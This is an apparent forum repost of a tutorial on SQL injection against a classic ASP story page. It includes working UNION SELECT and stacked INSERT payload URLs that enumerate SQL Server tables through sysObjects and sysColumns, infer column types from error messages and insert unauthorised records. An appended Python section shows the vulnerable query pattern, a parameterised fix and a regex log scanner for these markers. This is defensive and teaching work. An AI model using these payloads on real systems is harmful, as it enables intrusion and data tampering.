#2
09.04.2007, 19:07
bxN5
Regular
Registered: 08.01.2006
Posts: 865
SELECT s.sID,s.title,s.blurb,s.story,a.aName,a.aNationality,a.aAge FROM story s, author a WHERE sID=999 AND a.aID=s.aID UNION ALL SELECT 1,2,3,4,5,6,name FROM sysObjects WHERE xtype='U'

This translates into the following URL:

_http://stuart/homebase/practical/index.asp?story=334%20UNION%20ALL%20SELECT%201,2,3,4,5,6,name%20FROM%20sysObjects%20WHERE%20xtype='U'--

The page that results has the text "author" (circled in red) where we expected to see the poet's age, and the other fields are filled with the numbers one through six instead of valid information.

A couple of points:

a) 1,2,3,4,5,6,name are used arbitrarily to fill the fields with junk data. Only the last field, name, is important.

b) Occasionally an error will say the wrong data type has been used. In such cases, the field generating the error must be determined and switched to something quoted, e.g. 'one'.

c) 'name' is used because it is the value being sought. In the sysObjects table the column 'name' contains the table names.

d) A double dash must be added at the end to comment the remainder of the original statement.

The attacker now has the name of one of the tables - author. Now they get the other one.

http://stuart/homebase/practical/index.asp?story=334%20UNION%20ALL%20SELECT%201,2,3,4,5,6,name%20FROM%20sysObjects%20WHERE%20(xtype='U'%20AND%20(name<>'author'%20))--

They now have two tables, author and story, with at least the following properties:

a.author: aID, aName,aNationality,aAge

s.story: sID,aID, title,blurb,story

Checking cannot be overdone in SQL injection. Here, it is necessary to check that these are the complete lists of columns in each of the tables. The SysObjects table can also be used for that, but instead of calling the column 'name' they call the column 'info', which contains the number of columns in a given table.

The syntax is as follows:

_http://stuart/homebase/practical/index.asp?story=334%20UNION%20ALL%20SELECT%201,2,3,4,5,6,info%20FROM%20sysObjects%20WHERE%20(name='author')--


This returns 4 - so our author table is complete. But when story is run:

_http://stuart/homebase/practical/index.asp?story=334%20UNION%20ALL%20SELECT%201,2,3,4,5,6,info%20FROM%20sysObjects%20WHERE%20(name='story')--

This returns 6, a problem as we have only determined 5 of the columns.

The best way to find out the name of the remaining column is to again make use of the SysObjects table, but in conjunction with the SysColumns table as follows:

_http://stuart/homebase/practical/index.asp?story=334%20UNION%20ALL%20SELECT%201,2,3,4,5,6,sysColumns.name%20FROM%20sysObjects,sysColumns%20WHERE%20(sysObjects.id=sysColumns.id AND sysObjects.name='story' AND sysColumns.name not like 'sID' AND sysColumns.name not like 'aID' AND sysColumns.name not like 'title' AND sysColumns.name not like 'blurb' AND sysColumns.name not like 'story')--


Which returns 'storydate' and then completes the table.

The last thing needing to be done before publishing a tome of poetry is to check on the type of each column. Strictly speaking in this example it is not necessary, but just to be thorough this is how it is done:

_http://stuart/homebase/practical/index.asp?story=334%20union%20select%20sum(aID)%20from%20author--

Determining the column type again comes down to reading error messages, iterating through each column and running a SUM on it. If the field is numeric the following error (off the above URL) appears:

Error Type:

Microsoft OLE DB Provider for ODBC Drivers (0x80040E14)

[Microsoft][ODBC SQL Server Driver][SQL Server]All queries in an SQL statement containing a UNION operator must have an equal number of expressions in their target lists.

/homebase/practical/index.asp, line 20


However if the field is a text field this error is generated:

http://stuart/homebase/practical/index.asp?story=334%20union%20select%20sum(aName)%20from%20author--

Error Type:

Microsoft OLE DB Provider for ODBC Drivers (0x80040E07)

[Microsoft][ODBC SQL Server Driver][SQL Server]The sum or average aggregate operation cannot take a varchar data type as an argument.

/homebase/practical/index.asp, line 20


By running through this process, the following is known:

a.author: aID(int), aName(varchar),aNationality(varchar),aAge(varchar)

s.story: sID(int),aID(int), title(varchar),blurb(varchar),story(varchar),storydate(varchar)

Adding unauthorised data

With the information garnered in the database footprinting section, it is now possible to inject a valid INSERT statement to the database.

First the attacker needs to enter the poet name (author), for instance as follows:

INSERT INTO author VALUES ('Dante','Italian','89')

_http://stuart/homebase/practical/index.asp?story=999;INSERT%20INTO%20author%20VALUES%20('Dante','Italian','89')--


No error message appears; the record appears to have been entered correctly. However, the aID, which needs to be entered into the story table, remains unknown.

To obtain this, it's necessary to run another query:

_http://stuart/homebase/practical/index.asp?story=334%20UNION%20ALL%20SELECT%201,2,3,4,5,6,aID%20FROM%20author%20WHERE%20(aName='Dante')--


Which returns 10 - the aID for Dante.

The last step is to insert the poem into the story table.

s.story: sID(int),aID(int), title(varchar),blurb(varchar),story(varchar),storydate(varchar)

Taking a guess at the INSERT statement produces something like this:

INSERT INTO story VALUES (10,'I love som tam','som tam is a spicy Thai salad and this is a poem about it','som tam is so spicy,<br>It makes my mouth burn')

Which gives us the following URL:

_http://stuart/homebase/practical/index.asp?story=999; INSERT INTO story VALUES (10,'I love som tam','som tam is a spicy Thai salad and this is a poem about it','som tam is so spicy,<br>It makes my mouth burn','2000/12/12')--

When this returns no error, it is still necessary to establish the ID of the story, which is done similarly to establishing the author ID. In this case it is 9.

_http://stuart/homebase/practical/index.asp?story=9

(c) governmentsecurity.org
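The walkthrough above works only because the `story` parameter is pasted straight into the SQL text of the `SELECT ... FROM story s, author a WHERE sID=...` query. The following is an added example, written for this thread and not part of the quoted governmentsecurity.org article or of any real `index.asp`; it rebuilds the two tables the post enumerates in an in-memory SQLite database (the original target is SQL Server, so `sysObjects` is not reproduced here) and shows the same handler done two ways: the string-concatenation pattern that lets `334 UNION ALL SELECT ...` into the statement, and a hardened version that validates the id and binds it as a parameter. It also includes a small check that scans constructed access-log lines for the markers visible in the post's URLs (`UNION ALL SELECT`, `sysObjects`, `;INSERT INTO`, `--`) after URL-decoding, the way a detection engineer would triage such requests. All function names, the sample rows and the log lines are constructed for this example.

```python
import re
import sqlite3
from urllib.parse import unquote_plus

# Constructed schema mirroring the column lists the post derives:
# author(aID, aName, aNationality, aAge) and story(sID, aID, title, blurb, story, storydate).
SCHEMA = """
CREATE TABLE author (aID INTEGER PRIMARY KEY, aName TEXT, aNationality TEXT, aAge TEXT);
CREATE TABLE story  (sID INTEGER PRIMARY KEY, aID INTEGER, title TEXT,
                     blurb TEXT, story TEXT, storydate TEXT);
INSERT INTO author VALUES (1, 'Basho', 'Japanese', '50');
INSERT INTO story  VALUES (334, 1, 'Old pond', 'A frog', 'An old pond / a frog jumps in', '1686/01/01');
"""

# The request value used throughout the post (URL-decoded form).
INJECTED_PARAM = "334 UNION ALL SELECT 1,2,3,4,5,6,name FROM sysObjects WHERE xtype='U'--"


def open_db() -> sqlite3.Connection:
    """Fresh in-memory database populated with the constructed rows above."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def build_query_vulnerable(story_param: str) -> str:
    """The pattern the post exploits: the raw request parameter becomes part of the SQL text.
    Returned as a string only, to make the problem visible; it is never executed here."""
    return ("SELECT s.sID,s.title,s.blurb,s.story,a.aName,a.aNationality,a.aAge "
            "FROM story s, author a WHERE sID=" + story_param + " AND a.aID=s.aID")


def parse_story_id(story_param: str) -> int:
    """Allow-list validation: a story id is a plain positive integer, nothing else."""
    if not re.fullmatch(r"[1-9][0-9]{0,9}", story_param):
        raise ValueError("story must be a positive integer")
    return int(story_param)


def fetch_story_hardened(conn: sqlite3.Connection, story_param: str):
    """Validated id, bound with a placeholder: the value can never change the statement shape."""
    story_id = parse_story_id(story_param)
    cur = conn.execute(
        "SELECT s.sID,s.title,s.blurb,s.story,a.aName,a.aNationality,a.aAge "
        "FROM story s JOIN author a ON a.aID = s.aID WHERE s.sID = ?",
        (story_id,),
    )
    return cur.fetchone()


def rejects_injection(story_param: str) -> bool:
    """True when the hardened handler refuses the value before any SQL runs."""
    try:
        fetch_story_hardened(open_db(), story_param)
    except ValueError:
        return True
    return False


# Constructed access-log lines (hypothetical format, not real server output):
# the first is a normal request, the other two carry the post's injected parameters.
LOG_LINES = [
    "GET /homebase/practical/index.asp?story=334 200",
    "GET /homebase/practical/index.asp?story=334%20UNION%20ALL%20SELECT%201,2,3,4,5,6,name%20FROM%20sysObjects%20WHERE%20xtype='U'-- 200",
    "GET /homebase/practical/index.asp?story=999;INSERT%20INTO%20author%20VALUES%20('Dante','Italian','89')-- 200",
]

# Markers taken from the URLs shown in the post; matched case-insensitively after decoding.
SQLI_MARKERS = re.compile(r"union\s+all\s+select|sysobjects|syscolumns|;\s*insert\s+into|--", re.I)


def flag_suspicious_requests(lines):
    """Return the log lines whose URL-decoded form contains one of the markers."""
    return [line for line in lines if SQLI_MARKERS.search(unquote_plus(line))]


if __name__ == "__main__":
    print(build_query_vulnerable(INJECTED_PARAM))
    print(fetch_story_hardened(open_db(), "334"))
    print("hardened handler rejects injected value:", rejects_injection(INJECTED_PARAM))
    for line in flag_suspicious_requests(LOG_LINES):
        print("FLAGGED:", line)
```

In classic ASP against SQL Server the equivalent of the bound `?` is an `ADODB.Command` with `CreateParameter`, plus the same integer check on `Request.QueryString("story")` before the command runs; the marker scan is a triage aid, not a substitute for that fix, since the post itself shows how much variation (`sum(...)`, `syscolumns`, stacked `INSERT`) one vulnerable parameter admits.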